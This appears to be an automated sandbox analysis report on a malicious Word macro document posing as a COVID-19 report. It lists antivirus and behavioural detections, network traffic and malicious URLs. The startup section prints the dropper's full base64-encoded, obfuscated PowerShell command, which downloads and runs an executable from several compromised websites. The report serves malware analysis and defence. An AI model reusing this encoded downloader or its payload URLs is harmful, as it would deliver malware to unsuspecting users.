Loading ...

Play interactive tourEdit tour

Analysis Report COVID-19 report 09 24 2020.doc

Overview

General Information

Sample Name:COVID-19 report 09 24 2020.doc
Analysis ID:294916
MD5:41e0c7598e8ad0da1aa56dde0a2da422
SHA1:76ac2ce4f5cd3725de9e654484a3c7eb9a60d202
SHA256:84d837274cbcc7fea7d1806754185fecba6c90d352208ed2c444996864073135

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Creates HTML files with .exe extension (expired dropper behavior)
Creates processes via WMI
Encrypted powershell cmdline option found
Machine Learning detection for sample
PowerShell case anomaly found
Very long command line found
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 948 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • powershell.exe (PID: 2488 cmdline: POwersheLL -ENCOD JABFAGgAZQBmADUAOQBpAD0AKAAoACcAWgAnACsAJwBzADUAJwApACsAJwAwACcAKwAoACcAZAA1ACcAKwAnAGIAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAnACsAJwAtAGkAdABlAG0AJwApACAAJABFAG4AdgA6AFUAcwBlAHIAcABSAE8AZgBJAGwAZQBcAEkAMgBiAHkARABvAEkAXABlAGoAbwAyADYAUQBEAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAEQASQBSAEUAQwB0AG8AcgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAGMAVQByAGkAYABUAHkAUAByAG8AdABPAGMAbwBsACIAIAA9ACAAKAAoACcAdABsACcAKwAnAHMAMQAyACcAKQArACgAJwAsACAAdABsAHMAJwArACcAMQAnACkAKwAoACcAMQAnACsAJwAsACAAJwApACsAJwB0AGwAJwArACcAcwAnACkAOwAkAEYAMwB5AHMAcQBvAHYAIAA9ACAAKAAoACcAUAAnACsAJwBfAGwAdQAnACkAKwAnAGwAJwArACgAJwB2AHAAJwArACcAMQAnACkAKQA7ACQATQBsAG8AcAA4ADAAMwA9ACgAJwBGACcAKwAoACcAbgBqACcAKwAnAGsAcAA4AG8AJwApACkAOwAkAEQAZwBsAHIAeAA1AHgAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAwAH0ASQAyACcAKwAnAGIAeQAnACsAKAAnAGQAbwAnACsAJwBpACcAKQArACcAewAwAH0AJwArACgAJwBFACcAKwAnAGoAbwAnACkAKwAnADIANgBxAGQAewAnACsAJwAwACcAKwAnAH0AJwApACAAIAAtAGYAWwBDAEgAYQByAF0AOQAyACkAKwAkAEYAMwB5AHMAcQBvAHYAKwAoACcALgAnACsAKAAnAGUAeAAnACsAJwBlACcAKQApADsAJABFAHoAdwB2AGoAMQBtAD0AKAAoACcAVwBlACcAKwAnADcAJwApACsAJwBlACcAKwAoACcAdAAnACsAJwBlAHYAJwApACkAOwAkAFUAcAAyAGkAbQBlAHAAPQAmACgAJwBuAGUAdwAtACcAKwAnAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAE4AZQB0AC4AdwBFAGIAQwBMAGkAZQBuAHQAOwAkAFMAdwBrAGMAMgAyAG0APQAoACcAaAB0ACcAKwAnAHQAJwArACcAcAAnACsAJwA6ACcAKwAoACcALwAnACsAJwAvAHcAdwB3AC4AZgAnACsAJwBpACcAKQArACcAcgAnACsAKAAnAGgAYQBqAHMAJwArACcAaAAnACkAKwAoACcAbwAnACsAJwBlAHMALgBjAG8AJwArACcAbQAvAHcAJwApACsAJwBwACcAKwAnAC0AYQAnACsAJwBkACcAKwAnAG0AJwArACcAaQAnACsAJwBuAC8AJwArACcAUgAnACsAJwBnACcAKwAnAGEAaQAnACsAJwBUAC8AJwArACgAJwAqAGgAJwArACcAdAB0ACcAKQArACcAcAA6ACcAKwAnAC8ALwAnACsAKAAnAGYAYQBrACcAKwAnAGUAJwApACsAKAAnAHIAJwArACcAZQBhACcAKQArACcAZAAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACgAJwBtAC8AJwArACcATwAnACkAKwAoACcAbgAnACsAJwBlAFMAaQAnACsAJwBnAG4AJwArACcAYQBsAC0AVwAnACsAJwBlAGIALQBTACcAKwAnAEQASwAtACcAKQArACcASAAnACsAJwBUACcAKwAnAFQAJwArACcAUABTACcAKwAoACcALQAnACsAJwBJAG4AJwApACsAKAAnAHQAZQBnAHIAYQAnACsAJwB0AGkAJwApACsAKAAnAG8AbgAtAEYAaQBsACcAKwAnAGUAcwAvACcAKQArACgAJwBXAGYALwAnACsAJwAqACcAKQArACcAaAAnACsAKAAnAHQAJwArACcAdABwADoALwAnACkAKwAnAC8AJwArACgAJwB3ACcAKwAnAHcAdwAuACcAKQArACcAcgAnACsAKAAnAHQAdAAnACsAJwB1AHQAbwByAGkAJwApACsAKAAnAG4AZwAuAGMAJwArACcAbwBtACcAKQArACcALwAnACsAKAAnAHcAJwArACcAcAAtAGkAJwApACsAKAAnAG4AJwArACcAYwBsAHUAZAAnACkAKwAoACcAZQBzAC8AJwArACcATABsACcAKQArACgAJwBiAFkAJwArACcANgBvACcAKQArACgAJwAvACoAaAAnACsAJwB0ACcAKQArACgAJwB0AHAAJwArACcAOgAvAC8AYgAnACkAKwAoACcAbAB1ACcAKwAnAGUAJwApACsAJwBzACcAKwAnAGsAJwArACgAJwB5ACcAKwAnAHMAbwBsAC4AJwApACsAKAAnAGMAbwAnACsAJwBtACcAKQArACcALwBzACcAKwAnAHkAcwAnACsAJwAtACcAKwAoACcAYwAnACsAJwBhAGMAaAAnACkAKwAoACcAZQAvACcAKwAnADIAUgAnACkAKwAoACcAawAnACsAJwAvACoAaAB0ACcAKQArACgAJwB0AHAAOgAnACsAJwAvAC8AYwByACcAKQArACgAJwBhAHoAJwArACcAeQBiAG8AeABzAC4AJwArACcAYwBvAG0ALwAnACkAKwAoACcAYwBnACcAKwAnAGkAJwApACsAJwAtACcAKwAnAGIAJwArACcAaQBuACcAKwAoACcALwBJACcAKwAnAGEASgAvACcAKwAnACoAaAB0ACcAKQArACgAJwB0ACcAKwAnAHAAOgAnACkAKwAnAC8ALwAnACsAKAAnAHcAJwArACcAdwB3ACcAKQArACgAJwAuAHAAYQAnACsAJwByAGEAbQAnACsAJwBlACcAKQArACcAZABpACcAKwAoACcAYwBhAGwAZQAnACsAJwBkACcAKwAnAHUAYwBhAHQAaQAnACsAJwBvAG4AZwB1AGkAJwApACsAJwBkAGUAJwArACcAbAAnACsAKAAnAGkAJwArACcAbgBlAHMALgBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACkAKwAoACcAdwAnACsAJwBwAC0AJwApACsAKAAnAGEAZAAnACsAJwBtAGkAbgAnACkAKwAoACcALwAzAGoAJwArACcAWABVACcAKQArACcANQBCACcAKwAoACcAcAAnACsAJwAvACoAaAAnACkAKwAnAHQAdAAnACsAKAAnAHAAJwArACcAOgAvAC8AJwApACsAJwBuACcAKwAnAHUAaAAnACsAKAAnAGEAdAAnACsAJwBvAHkAcwAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvAHcAcAAnACkAKwAnAC0AJwArACgAJwBhACcAKwAnAGQAbQBpACcAKQArACgAJwBuAC8AJwArACcAVwBXACcAKQArACgAJwBBADQAUgAnACsAJwAvACcAKQApAC4AIgBzAFAAbABgAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEsAaABtAHgANgByAGMAPQAoACcAQgBrACcAKwAoACcANwByADQAJwArACcAagAnACkAKwAnAGgAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAWQBnAHoAeABrAG4AagAgAGkAbgAgACQAUwB3AGsAYwAyADIAbQApAHsAdAByAHkAewAkAFUAcAAyAGkAbQBlAHAALgAiAEQATwBXAGAATgBsAE8AYABBAEQAZgBgAGkATABlACIAKAAkAFkAZwB6AHgAawBuAGoALAAgACQARABnAGwAcgB4ADUAeAApADsAJABZAGMAZgA4ADQAZgB6AD0AKAAoACcAWgBnACcAKwAnAHUAMwAnACkAKwAoACcAZAAnACsAJwB5AGYAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQARABnAGwAcgB4ADUAeAApAC4AIgBsAGAAZQBuAEcAdABIACIAIAAtAGcAZQAgADIAMQA3ADcAMwApACAAewAuACgAJwBJAG4AdgBvACcAKwAnAGsAZQAtAEkAdABlACcAKwAnAG0AJwApACgAJABEAGcAbAByAHgANQB4ACkAOwAkAEwANwBoAHYAMwB5AHoAPQAoACcAQwAnACsAKAAnAHQAXwAnACsAJwA2ADYAcAB3ACcAKQApADsAYgByAGUAYQBrADsAJABVAGgAcgAwAHkAXwBqAD0AKAAoACcATwB4ACcAKwAnAHkAJwApACsAKAAnADgAawAnACsAJwBwACcAKQArACcAbwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFUAegBtAG4AXwBzAGcAPQAoACgAJwBNAGsAJwArACcAMQB4AHoAOAAnACkAKwAnAGUAJwApAA== MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus / Scanner detection for submitted sampleShow sources
Source: COVID-19 report 09 24 2020.docAvira: detected
Antivirus detection for URL or domainShow sources
Source: http://www.rttutoring.com/wp-includes/LlbY6o/Avira URL Cloud: Label: malware
Source: http://www.firhajshoes.com/wp-admin/RgaiT/Avira URL Cloud: Label: malware
Source: http://fakeread.com/OneSignal-Web-SDK-HTTPS-Integration-Files/Wf/Avira URL Cloud: Label: phishing
Source: http://nuhatoys.com/wp-admin/WWA4R/Avira URL Cloud: Label: malware
Source: http://blueskysol.com/sys-cache/2Rk/Avira URL Cloud: Label: phishing
Multi AV Scanner detection for domain / URLShow sources
Source: firhajshoes.comVirustotal: Detection: 13%Perma Link
Source: blueskysol.comVirustotal: Detection: 8%Perma Link
Source: crazyboxs.comVirustotal: Detection: 11%Perma Link
Source: fakeread.comVirustotal: Detection: 12%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: COVID-19 report 09 24 2020.docVirustotal: Detection: 70%Perma Link
Source: COVID-19 report 09 24 2020.docMetadefender: Detection: 52%Perma Link
Source: COVID-19 report 09 24 2020.docReversingLabs: Detection: 72%
Machine Learning detection for sampleShow sources
Source: COVID-19 report 09 24 2020.docJoe Sandbox ML: detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: global trafficDNS query: name: www.firhajshoes.com
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 166.62.28.114:80
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 166.62.28.114:80

Networking:

barindex
Creates HTML files with .exe extension (expired dropper behavior)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: P_lulvp1.exe.2.dr
Source: global trafficHTTP traffic detected: GET /wp-admin/RgaiT/ HTTP/1.1Host: www.firhajshoes.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: www.firhajshoes.com
Source: global trafficHTTP traffic detected: GET /OneSignal-Web-SDK-HTTPS-Integration-Files/Wf/ HTTP/1.1Host: fakeread.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/LlbY6o/ HTTP/1.1Host: www.rttutoring.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /sys-cache/2Rk/ HTTP/1.1Host: blueskysol.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cgi-bin/IaJ/ HTTP/1.1Host: crazyboxs.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-admin/WWA4R/ HTTP/1.1Host: nuhatoys.comConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 166.62.28.114 166.62.28.114
Source: Joe Sandbox ViewASN Name: ST-BGPUS ST-BGPUS
Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B5ED8443-1A3F-4CA6-941D-F5C2CCA9C0AC}.tmpJump to behavior
Source: global trafficHTTP traffic detected: GET /wp-admin/RgaiT/ HTTP/1.1Host: www.firhajshoes.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: www.firhajshoes.com
Source: global trafficHTTP traffic detected: GET /OneSignal-Web-SDK-HTTPS-Integration-Files/Wf/ HTTP/1.1Host: fakeread.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/LlbY6o/ HTTP/1.1Host: www.rttutoring.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /sys-cache/2Rk/ HTTP/1.1Host: blueskysol.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cgi-bin/IaJ/ HTTP/1.1Host: crazyboxs.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-admin/WWA4R/ HTTP/1.1Host: nuhatoys.comConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: www.firhajshoes.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 08 Oct 2020 06:04:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveSet-Cookie: __cfduid=d0d517d150798b3ca21f38bf128531aa21602137078; expires=Sat, 07-Nov-20 06:04:38 GMT; path=/; domain=.fakeread.com; HttpOnly; SameSite=LaxX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICcf-request-id: 05a868d4b600001ec6ab9be200000001Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?lkg-colo=20&lkg-time=1602137079"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 5dedaa678d6e1ec6-AMSData Raw: 34 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 Data Ascii: 4c7<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-88

System Summary: